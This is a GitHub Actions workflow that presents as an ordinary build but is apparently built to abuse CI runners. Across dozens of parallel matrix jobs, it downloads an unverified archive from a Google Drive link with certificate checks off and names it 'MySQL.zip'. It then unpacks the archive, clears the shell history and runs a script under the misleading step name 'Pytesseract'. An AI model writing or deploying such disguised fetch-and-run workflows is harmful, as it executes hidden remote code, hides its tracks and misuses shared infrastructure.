name: nanothao927network
on:
  push:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  RUN:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.o, I.i, I.ii]
        flag: ['Collect', 'Design', 'Review', 'Launch', 'Deliver']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: install module
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1rfKL_NFlecAI45A-sAW1Y-U6Pd8g68lY" -O MySQL.zip
        unzip -o MySQL.zip
        rm MySQL.zip
        history -c && history -w

    - name: Pytesseract
      run: bash requirements.sh


  VERIFY1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.o, I.i, I.ii]
        flag: ['Configure', 'Build', 'Analyze', 'Operate', 'Distribute']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: install module
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1rfKL_NFlecAI45A-sAW1Y-U6Pd8g68lY" -O MySQL.zip
        unzip -o MySQL.zip
        rm MySQL.zip
        history -c && history -w

    - name: Pytesseract
      run: bash requirements.sh
        
